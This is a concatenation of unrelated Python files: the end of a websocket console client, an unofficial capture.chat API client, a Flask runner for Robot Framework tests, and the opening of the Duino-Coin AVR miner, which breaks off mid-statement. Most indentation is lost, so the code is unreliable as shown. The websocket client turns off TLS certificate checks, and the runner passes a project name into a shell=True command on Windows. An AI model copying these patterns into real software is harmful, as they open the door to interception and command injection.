opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
            if isinstance(data, bytes) and len(data) > 2 and data[:2] == b'\037\213':  # gzip magic number
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
client.py
|
from typing import BinaryIO
from .lib.objects import *
from .lib.exceptions import *
from .threads import Threads
from .eventsource import SSE, Recall
import threading
import random
import requests
import json
class Client(Threads, Recall, SSE):
    def __init__(self, session_id: str = None):
        # Generate the session id at call time; a default argument would be
        # evaluated once at class definition and shared by every instance.
        if session_id is None:
            session_id = str(random.randint(1, 9999))
        self.token = None
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"session-id": session_id,
"x-user-agent": "14 Web/1 ru"
}
self.api = "https://capture.chat/api"
Threads.__init__(self)
Recall.__init__(self)
SSE.__init__(self, self)
def handle(self, data, event):
return self.solve(data, event)
def login_token(self, token: str):
self.headers["X-Token"] = token
self.token = token
    def get_topic_id(self, url: str):
        response = requests.get(f"{self.api}/link/preview?url={url}", headers=self.headers)
        # Only read the body after confirming the request succeeded.
        if response.status_code != 200: CheckExceptions(response.json())
        else: return str(response.json()["topic_id"])
def get_notifications(self):
response = requests.get(f"{self.api}/notification", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return Notifications(response.json()["items"]).Notifications
def get_topic_users(self, topicId: str, count: int = 10):
response = requests.get(f"{self.api}/topic/{topicId}/member?count={count}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return UserProfileList(response.json()["items"]).UserProfileList
def get_user_topics(self, userId: str, count: int = 10):
response = requests.get(f"{self.api}/user/{userId}/topic?count={count}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return TopicList(response.json()["items"]).TopicList
def get_discover_topic(self, count: int = 10, type: str = "default"):
if type == "default": api = f"{self.api}/topic/discover?count={count}"
if type == "latest": api = f"{self.api}/topic/discover?count={count}"
elif type == "trending": api = f"{self.api}/topic/discover/1582634058468904012?count={count}"
elif type == "chats": api = f"{self.api}/topic/discover/1582658119463642908?count={count}"
elif type == "topics": api = f"{self.api}/topic/discover/1582658869630172140?count={count}"
response = requests.get(api)
if response.status_code != 200: CheckExceptions(response.json())
else:
if type == "latest": return TopicList(response.json()["collections"]).TopicList
else: return TopicList(response.json()["items"]).TopicList
def get_topics(self, count: int = 10):
response = requests.get(f"{self.api}/topic?count={count}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return TopicList(response.json()["items"]).TopicList
def get_user_info(self, userId: str):
response = requests.get(f"{self.api}/user/{userId}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return UserProfile(response.json()).UserProfile
def get_trending_gif(self):
response = requests.get(f"{self.api}/gifs/trending", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return Gifs(response.json()).Gifs
    def get_topic_photos(self, topicId: str, count: int = 50, reverse: bool = True):
if reverse: reverse = "true"
elif not reverse: reverse = "false"
response = requests.get(f"{self.api}/topic/{topicId}/photo?count={count}&reverse={reverse}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return PhotoList(response.json()["items"]).PhotoList
def get_topic_messages(self, topicId: str, count: int = 10):
response = requests.get(f"{self.api}/topic/{topicId}/message?count={count}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return MessageList(response.json()["items"]).MessageList
def search_mention_users(self, topicId: str, prefix: str = ""):
response = requests.get(f"{self.api}/topic/{topicId}/mention/suggest?prefix={prefix}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return UserProfileList(response.json()["users"]).UserProfileList
def send_message(self, topicId: str, message: str = None, replyMessage: str = None, photo: [BinaryIO, list] = None, gifId: str = None, gifProvider: str = None):
links = []
        if photo:
            if isinstance(photo, list): photos = photo
            elif hasattr(photo, "name"): photos = [photo]
            else: raise TypeError("Photo should be BinaryIO!")
for photo in photos:
multipart = {'photo': (photo.__getattribute__("name"), photo), }
response = requests.post(f"{self.api}/topic/{topicId}/message/photo", headers=self.headers, files=multipart)
if response.status_code != 200: CheckExceptions(response.json())
else: links.append(response.json()["photo"])
data = {
"text": message,
"photos": links
}
if replyMessage: data["quote_message_id"] = replyMessage
if gifId and gifProvider: data["gif_id"] = gifId; data["gif_provider"] = gifProvider
data = json.dumps(data)
response = requests.post(f"{self.api}/topic/{topicId}/message", headers=self.headers, data=data)
if response.status_code != 200: return CheckExceptions(response.json())
else: return Message(response.json()).Message
def create_topic(self, bio: str, name: str, isChannel: bool = False, isPrivate: bool = False):
data = json.dumps({
"channel": isChannel,
"private": isPrivate,
"name": name,
"content": bio
})
response = requests.post(f"{self.api}/topic", data=data, headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def edit_topic(self, topicId: str, bio: str = None, name: str = None, categoryId: int = 1, mute: bool = False, sound: bool = False):
data = json.dumps({
"category_id": categoryId,
"name": name,
"discription": bio
})
_data = json.dumps({"sound": sound, "mute": mute})
requests.patch(f"{self.api}/topicId/{topicId}/settings", data=_data, headers=self.headers)
response = requests.patch(f"{self.api}/topicId/{topicId}", data=data, headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def login(self, email: str):
response = requests.post(f"{self.api}/auth/?username={email}%40gmail.com")
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def delete_message(self, topicId: str, messageId: str):
        response = requests.delete(f"{self.api}/topic/{topicId}/message/{messageId}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def leave_topic(self, topicId: str):
response = requests.delete(f"{self.api}/topic/{topicId}/subscription", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def join_topic(self, topicId: str):
response = requests.post(f"{self.api}/topic/{topicId}/subscription", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def edit_profile(self, photo: BinaryIO = None, username: str = None, bio: str = None, location: str = None, status: bool = True):
        link = None  # avoids a NameError below when no photo is uploaded
        if photo is not None:
multipart = {'photo': (photo.__getattribute__("name"), photo), }
response = requests.post(f"{self.api}/user/me/photo", headers=self.headers, files=multipart)
if response.status_code != 200: CheckExceptions(response.json())
else: link = response.json()["photo"]
data = json.dumps({
"bio": bio,
"location": location,
"name": username,
"online": status,
"photo": link
})
response = requests.patch(f"{self.api}/user/me", data=data, headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def sign_up(self, username):
data = json.dumps({"username": username})
response = requests.post(f"{self.api}/auth/username", data=data)
if response.status_code != 200: CheckExceptions(response.json())
else: return NewAcc(response.json()).NewAcc
def change_user_role(self, topicId: str, userId: str, role: str):
data = json.dumps({"admin": role})
response = requests.patch(f"{self.api}/topic/{topicId}/member/{userId}", data=data, headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def edit_message(self, topicId: str, messageId: str, newText: str):
data = json.dumps({"text": newText})
response = requests.patch(f"{self.api}/topic/{topicId}/message/{messageId}", data=data, headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def ban(self, topicId: str, userId: str):
        response = requests.post(f"{self.api}/topic/{topicId}/ban/{userId}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def report(self, userId: str, reason: str = "From Web"):
data = {"reason": reason}
if reason is None: data["comment"] = "Web"
data = json.dumps(data)
response = requests.post(f"{self.api}/user/{userId}/report", data=data, headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def report_message(self, topicId: str, messageId: str, reason: str = "From Web"):
data = {"reason": reason}
if reason is None: data["comment"] = "Web"
data = json.dumps(data)
response = requests.post(f"{self.api}/topic/{topicId}/message/{messageId}", data=data, headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def unban(self, topicId: str, userId: str):
response = requests.delete(f"{self.api}/topic/{topicId}/ban/{userId}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def start_dm(self, userId: str):
response = requests.post(f"{self.api}/dm/user/{userId}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def follow(self, topicId: str):
response = requests.post(f"{self.api}/topic/{topicId}/follow", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def unfollow(self, topicId: str):
response = requests.delete(f"{self.api}/topic/{topicId}/unfollow", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def search_topic(self, text: str):
response = requests.get(f"{self.api}/topic/search/{text}", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return TopicList(response.json()).TopicList
def unread(self, topicId: str):
response = requests.delete(f"{self.api}/topic/{topicId}/unread", headers=self.headers)
if response.status_code != 200: CheckExceptions(response.json())
else: return response.status_code
def start_typing_status(self, topicId: str, time: int = 5, status: str = "text", messageId: str = None):
threading.Thread(target=self.send, args=(self._send_typing_status_, (self.headers, topicId, status, ), time)).start()
if messageId: threading.Thread(target=self.send_edit, args=(self._when_typing_, topicId, messageId, )).start()
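# --- Usage sketch (illustrative only, not part of the library) ---
# The token and topic URL are placeholders; login_token() just sets the
# X-Token header, after which the endpoints above can be called.
def _example_client_usage():
    client = Client()
    client.login_token("YOUR_TOKEN")  # hypothetical token
    topic_id = client.get_topic_id("https://capture.chat/t/example")  # placeholder link
    client.send_message(topic_id, message="Hello from the usage sketch")
    return client.get_topic_messages(topic_id, count=5)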
|
runner.py
|
# -*- coding: utf-8 -*-
__author__ = "苦叶子"
"""
WeChat official account: 开源优测
Email: lymking@foxmail.com
"""
import os
import platform
import codecs
import time
import json
import subprocess
from datetime import datetime
from threading import Thread, Timer
import xml.etree.ElementTree as ET
from flask import current_app
from flask_login import current_user
from sqlalchemy import and_
from ..models import AutoTask, AutoProject, User
from .. import db
from ..auto.builder import Builder
from .process import Process
def robot_run(category, id):
app = current_app._get_current_object()
if len(app.config["RESULTS"]) > int(app.config['AUTO_PROCESS_COUNT']):
return json.dumps({"status": "busying", "msg": "任务池已满!!!"})
builder = Builder(category, id)
builder.build()
app.config["RESULTS"].append(app.config["POOL"].apply_async(builder.test_run, (app, current_user.get_id(),)))
# app.config["POOL"].join()
return json.dumps({"status": "success", "msg": "任务启动成功"})
def robot_async_run(category, id):
app = current_app._get_current_object()
builder = Builder(category, id)
builder.build()
thr = Thread(target=builder.test_run, args=[app, current_user.get_id()])
#app.config["RESULTS"].append(thr)
thr.start()
return json.dumps({"status": "success", "msg": "任务启动成功"})
def check_process_status(app):
print("timer to check ....%d" % len(app.config["RUNNERS"]))
with app.app_context():
try:
for runner in app.config["RUNNERS"]:
if runner.is_finish():
runner.write_result()
app.config["RUNNERS"].remove(runner)
except Exception as e:
print(e)
def debug_run(id):
builder = Builder(id)
builder.build()
runner = Runner(builder.id, builder.build_no)
runner.debug()
return (builder.id, builder.build_no)
def run_process(category, id):
builder = Builder(id)
builder.build()
runner = Runner(builder.id, builder.build_no)
if category == "auto":
runner.auto_run()
else:
runner.run()
app = current_app._get_current_object()
app.config["TRIGGER"].update_job(id)
app.config["RUNNERS"].append({
"project_id": builder.id,
"task_id": builder.build_no,
"runner": runner
})
"""
for r in app.config["RUNNERS"]:
print("get running logs: %s %s" % (r["project_id"], r["task_id"]))
p = r["runner"]
while p._process.poll() is None:
line = p._process.stdout.readline()
line = line.strip()
if line:
print('Subprogram output: [{}]'.format(line.decode()))
if p._process.returncode == 0:
print('Subprogram success')
else:
print('Subprogram failed')
"""
return json.dumps({"status": "success", "msg": "任务启动成功"})
class Runner:
def __init__(self, project_id, build_no):
self.project_id = project_id
self.build_no = build_no
self._process = None
self._timer = None
self._out_fd = None
def auto_run(self):
try:
user_id = User.query.filter_by(username="AutoExecutor").first().id
name = AutoProject.query.filter_by(id=self.project_id).first().name
task = AutoTask(project_id=self.project_id,
build_no=self.build_no,
status="running",
create_author_id=user_id,
create_timestamp=datetime.now())
db.session.add(task)
db.session.commit()
output_dir = os.getcwd() + "/logs/%s/%s" % (self.project_id, self.build_no)
output_dir = output_dir.replace("\\", "/")
# -x result/output.xml -l result/log.html -r result/report.html
shell = False
if "Windows" in platform.platform():
self._out_fd = codecs.open(output_dir + "/logs.log", "a+", "cp936")
command = "pybot -d %s -L DEBUG -N %s %s/testcase.robot" % (output_dir, name, output_dir)
shell = True
else:
self._out_fd = codecs.open(output_dir + "/logs.log", "a+", "utf-8")
command = ["pybot", "-d", "%s" % output_dir, "-L", "DEBUG", "-N", "%s" % name, "%s/testcase.robot" % output_dir]
#print(command)
self._process = subprocess.Popen(command, shell=shell, stdout=self._out_fd, stderr=subprocess.STDOUT)
#self._process = Process(command)
#self._process.start()
except Exception as e:
print(str(e))
pass
return {"status": "success",
"msg": "任务启动成功",
"project_id": self.project_id,
"build_no": self.build_no}
def run(self):
#
try:
name = AutoProject.query.filter_by(id=self.project_id).first().name
task = AutoTask(project_id=self.project_id,
build_no=self.build_no,
status="running",
create_author_id=current_user.get_id(),
create_timestamp=datetime.now())
db.session.add(task)
db.session.commit()
output_dir = os.getcwd() + "/logs/%s/%s" % (self.project_id, self.build_no)
output_dir = output_dir.replace("\\", "/")
shell = False
if "Windows" in platform.platform():
self._out_fd = codecs.open(output_dir + "/logs.log", "a+", "cp936")
command = "pybot -d %s -L DEBUG -N %s %s/testcase.robot" % (output_dir, name, output_dir)
shell = True
else:
self._out_fd = codecs.open(output_dir + "/logs.log", "a+", "utf-8")
command = ["pybot", "-d", "%s" % output_dir, "-L", "DEBUG", "-N", "%s" % name,
"%s/testcase.robot" % output_dir]
# print(command)
self._process = subprocess.Popen(command, shell=shell, stdout=self._out_fd, stderr=subprocess.STDOUT)
except Exception as e:
print(str(e))
pass
return {"status": "success",
"msg": "任务启动成功",
"project_id": self.project_id,
"build_no": self.build_no}
def debug(self):
try:
output_dir = os.getcwd() + "/logs/%s/%s" % (self.project_id, self.build_no)
output_dir = output_dir.replace("\\", "/")
# -x result/output.xml -l result/log.html -r result/report.html
command = ["pybot", "-d", "%s" % output_dir, "--dryrun", "-N", "调试输出", "%s/testcase.robot" % output_dir]
self._out_fd = open(output_dir + "/debug.log", "a+")
self._process = subprocess.Popen(command, shell=False, stdout=self._out_fd, stderr=subprocess.STDOUT)
while True:
                if self._process.poll() is not None:  # child process has finished (any exit code)
break
else:
time.sleep(0.2)
except Exception as e:
print(str(e))
pass
return {"status": "success",
"msg": "任务启动成功",
"project_id": self.project_id,
"build_no": self.build_no}
def stop(self):
status = "success"
msg = "任务终止"
try:
self._process.stop()
msg += "成功"
except Exception as e:
status = "fail"
msg = msg + "异常" + str(e)
return {"status": status,
"msg": msg,
"project_id": self.project_id,
"build_no": self.build_no}
def get_output(self, wait_until_finished=False):
return self._process.get_output(wait_until_finished)
def is_finish(self):
return self._process.is_finished()
def write_result(self):
output_dir = os.getcwd() + "/logs/%s/%s" % (self.project_id, self.build_no)
output_dir = output_dir.replace("\\", "/")
print("write ... result ...")
print(os.path.exists(output_dir + "/log.html"))
if os.path.exists(output_dir + "/log.html"):
time.sleep(0.2)
task = AutoTask.query.filter(and_(AutoTask.project_id == self.project_id,
AutoTask.build_no == self.build_no)).first()
tree = ET.parse(output_dir + "/output.xml")
root = tree.getroot()
passed = root.find("./statistics/suite/stat").attrib["pass"]
fail = root.find("./statistics/suite/stat").attrib["fail"]
if int(fail) != 0:
task.status = 'fail'
else:
task.status = 'pass'
db.session.merge(task)
db.session.commit()
            if self._timer:
                self._timer.cancel()
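# For reference, the command assembled in auto_run()/run() above looks
# roughly like this on non-Windows hosts (paths and names are illustrative):
#
#   pybot -d logs/<project_id>/<build_no> -L DEBUG -N <project name> \
#       logs/<project_id>/<build_no>/testcase.robot
#
# On Windows the same command is passed as a single string with shell=True.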
|
AVR_Miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python AVR Miner (v2.5.7)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from platform import machine as osprocessor
from pathlib import Path
from platform import system
from re import sub
from signal import SIGINT, signal
from socket import socket
from subprocess import DEVNULL, Popen, check_call, call
from threading import Thread as thrThread
from threading import Lock
from time import ctime, sleep, strptime, time
from statistics import mean
from random import choice
import select
import pip
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
call([sys.executable, __file__])
def now():
# Return datetime object
return datetime.now()
try:
# Check if pyserial is installed
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Pyserial is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "pyserial" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('pyserial')
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('requests')
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Colorama is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "colorama" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('colorama')
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Pypresence is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "pypresence" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('pypresence')
# Global variables
MINER_VER = '2.57' # Version number
NODE_ADDRESS = "server.duinocoin.com"
AVAILABLE_PORTS = [
2811,
2812,
2813,
2814,
2815,
2816,
2817
]
SOC_TIMEOUT = 45
PERIODIC_REPORT_TIME = 60
AVR_TIMEOUT = 3.1 # diff 6 * 100 / 196 h/s = 3.06
BAUDRATE = 115200
RESOURCES_DIR = 'AVRMiner_' + str(MINER_VER) + '_resources'
shares = [0, 0]
hashrate_mean = []
ping_mean = []
diff = 0
shuffle_ports = "y"
donator_running = False
job = ''
debug = 'n'
discord_presence = 'y'
rig_identifier = 'None'
donation_level = 0
hashrate = 0
config = ConfigParser()
thread_lock = Lock()
mining_start_time = time()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + '/langs.json').is_file():
url = ('https://raw.githubusercontent.com/'
+ 'revoxhere/'
+ 'duino-coin/master/Resources/'
+ 'AVR_Miner_langs.json')
r = requests.get(url)
with open(RESOURCES_DIR + '/langs.json', 'wb') as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + '/langs.json', 'r', encoding='utf8') as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
if getlocale()[0] is None:
setlocale(LC_ALL, 'en_US.UTF-8')
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + '/Miner_config.cfg').is_file():
locale = getdefaultlocale()[0]
if locale.startswith('es'):
lang = 'spanish'
elif locale.startswith('sk'):
lang = 'slovak'
elif locale.startswith('ru'):
lang = 'russian'
elif locale.startswith('pl'):
lang = 'polish'
elif locale.startswith('fr'):
lang = 'french'
elif locale.startswith('tr'):
lang = 'turkish'
elif locale.startswith('pt'):
lang = 'portuguese'
elif locale.startswith('zh'):
lang = 'chinese_simplified'
elif locale.startswith('th'):
lang = 'thai'
else:
lang = 'english'
else:
try:
# Read language from configfile
config.read(RESOURCES_DIR + '/Miner_config.cfg')
lang = config['Duino-Coin-AVR-Miner']['language']
except Exception:
# If it fails, fallback to english
lang = 'english'
except:
lang = 'english'
def get_string(string_name: str):
# Get string from language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file['english']:
return lang_file['english'][string_name]
else:
return 'String not found: ' + string_name
def get_prefix(diff: int):
if int(diff) >= 1000000000:
diff = str(round(diff / 1000000000)) + "G"
elif int(diff) >= 1000000:
diff = str(round(diff / 1000000)) + "M"
elif int(diff) >= 1000:
diff = str(round(diff / 1000)) + "k"
return str(diff)
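# e.g. get_prefix(2000000) -> "2M", get_prefix(3000) -> "3k",
# get_prefix(950) -> "950" (values below 1000 are returned unchanged)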
def debug_output(text: str):
# Debug output
if debug == 'y':
print(
Style.RESET_ALL
+ now().strftime(Style.DIM + '%H:%M:%S.%f ')
+ 'DEBUG: '
+ str(text))
def title(title: str):
# Window title
if osname == 'nt':
# Windows systems
ossystem('title ' + title)
else:
# Most standard terminals
print('\33]0;' + title + '\a', end='')
sys.stdout.flush()
def get_fastest_connection(server_ip: str):
connection_pool = []
available_connections = []
pretty_print("net0",
" "
+ get_string("connection_search")
+ "...",
"warning")
for i in range(len(AVAILABLE_PORTS)):
connection_pool.append(socket())
connection_pool[i].setblocking(0)
try:
connection_pool[i].connect((server_ip,
AVAILABLE_PORTS[i]))
connection_pool[i].settimeout(SOC_TIMEOUT)
except BlockingIOError as e:
pass
ready_connections, _, __ = select.select(connection_pool, [], [])
while True:
for connection in ready_connections:
try:
server_version = connection.recv(100).decode()
except:
continue
            if not server_version:  # decode() yields str, so check for an empty string
continue
available_connections.append(connection)
connection.send(b'PING')
ready_connections, _, __ = select.select(available_connections, [], [])
ready_connections[0].recv(100)
ready_connections[0].settimeout(SOC_TIMEOUT)
return ready_connections[0].getpeername()[1]
def handler(signal_received, frame):
# SIGINT handler
pretty_print(
'sys0',
get_string('sigint_detected')
+ Style.NORMAL
+ Fore.RESET
+ get_string('goodbye'),
'warning')
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def load_config():
# Config loading section
global username
global donation_level
global avrport
global debug
global rig_identifier
global discord_presence
global shuffle_ports
global SOC_TIMEOUT
global AVR_TIMEOUT
global PERIODIC_REPORT_TIME
# Initial configuration section
if not Path(str(RESOURCES_DIR) + '/Miner_config.cfg').is_file():
print(
Style.BRIGHT
+ get_string('basic_config_tool')
+ RESOURCES_DIR
+ get_string('edit_config_file_warning'))
print(
Style.RESET_ALL
+ get_string('dont_have_account')
+ Fore.YELLOW
+ get_string('wallet')
+ Fore.RESET
+ get_string('register_warning'))
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_username')
+ Fore.RESET
+ Style.BRIGHT)
print(Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ports_message'))
portlist = serial.tools.list_ports.comports(include_links=True)
for port in portlist:
print(Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ ' '
+ str(port))
print(Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ports_notice'))
port_names = []
for port in portlist:
port_names.append(port.device)
avrport = ''
while True:
current_port = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_avrport')
+ Fore.RESET
+ Style.BRIGHT)
if current_port in port_names:
avrport += current_port
confirmation = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_anotherport')
+ Fore.RESET
+ Style.BRIGHT)
if confirmation == 'y' or confirmation == 'Y':
avrport += ','
else:
break
else:
print(Style.RESET_ALL
+ Fore.RED
+ 'Please enter a valid COM port from the list above')
rig_identifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_rig_identifier')
+ Fore.RESET
+ Style.BRIGHT)
if rig_identifier == 'y' or rig_identifier == 'Y':
rig_identifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_rig_name')
+ Fore.RESET
+ Style.BRIGHT)
else:
rig_identifier = 'None'
donation_level = '0'
if osname == 'nt' or osname == 'posix':
donation_level = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_donation_level')
+ Fore.RESET
+ Style.BRIGHT)
        # Check whether donation_level is valid
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
# Format data
config['Duino-Coin-AVR-Miner'] = {
'username': username,
'avrport': avrport,
'donate': donation_level,
'language': lang,
'identifier': rig_identifier,
'debug': 'n',
"soc_timeout": 45,
"avr_timeout": 3.1,
"discord_presence": "y",
"periodic_report": 60,
"shuffle_ports": "y"
}
# Write data to file
with open(str(RESOURCES_DIR)
+ '/Miner_config.cfg', 'w') as configfile:
config.write(configfile)
avrport = avrport.split(',')
print(Style.RESET_ALL + get_string('config_saved'))
else: # If config already exists, load from it
config.read(str(RESOURCES_DIR) + '/Miner_config.cfg')
username = config['Duino-Coin-AVR-Miner']['username']
avrport = config['Duino-Coin-AVR-Miner']['avrport']
avrport = avrport.replace(" ", "").split(',')
donation_level = config['Duino-Coin-AVR-Miner']['donate']
debug = config['Duino-Coin-AVR-Miner']['debug']
rig_identifier = config['Duino-Coin-AVR-Miner']['identifier']
SOC_TIMEOUT = int(config["Duino-Coin-AVR-Miner"]["soc_timeout"])
AVR_TIMEOUT = float(config["Duino-Coin-AVR-Miner"]["avr_timeout"])
discord_presence = config["Duino-Coin-AVR-Miner"]["discord_presence"]
shuffle_ports = config["Duino-Coin-AVR-Miner"]["shuffle_ports"]
PERIODIC_REPORT_TIME = int(
config["Duino-Coin-AVR-Miner"]["periodic_report"])
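# For reference, the generated Miner_config.cfg is a plain INI file mirroring
# the dictionary written above (values are placeholders):
#
#   [Duino-Coin-AVR-Miner]
#   username = your_username
#   avrport = COM3
#   donate = 1
#   language = english
#   identifier = None
#   debug = n
#   soc_timeout = 45
#   avr_timeout = 3.1
#   discord_presence = y
#   periodic_report = 60
#   shuffle_ports = y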
def greeting():
# greeting message depending on time
global greeting
print(Style.RESET_ALL)
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = get_string('greeting_morning')
elif current_hour == 12:
greeting = get_string('greeting_noon')
elif current_hour > 12 and current_hour < 18:
greeting = get_string('greeting_afternoon')
elif current_hour >= 18:
greeting = get_string('greeting_evening')
else:
greeting = get_string('greeting_back')
# Startup message
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Fore.YELLOW
+ Style.BRIGHT
+ get_string('banner')
+ Style.RESET_ALL
+ Fore.MAGENTA
+ ' (v'
+ str(MINER_VER)
+ ') '
+ Fore.RESET
+ '2019-2021')
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.MAGENTA
+ 'https://github.com/revoxhere/duino-coin')
if lang != "english":
print(
Style.DIM
+ Fore.MAGENTA
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ lang.capitalize()
+ " translation: "
+ Fore.MAGENTA
+ get_string("translation_autor"))
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('avr_on_port')
+ Style.BRIGHT
+ Fore.YELLOW
+ ' '.join(avrport))
if osname == 'nt' or osname == 'posix':
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('donation_level')
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('algorithm')
+ Style.BRIGHT
+ Fore.YELLOW
+ 'DUCO-S1A ⚙ AVR diff')
if rig_identifier != "None":
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('rig_identifier')
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identifier)
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ', '
+ Style.BRIGHT
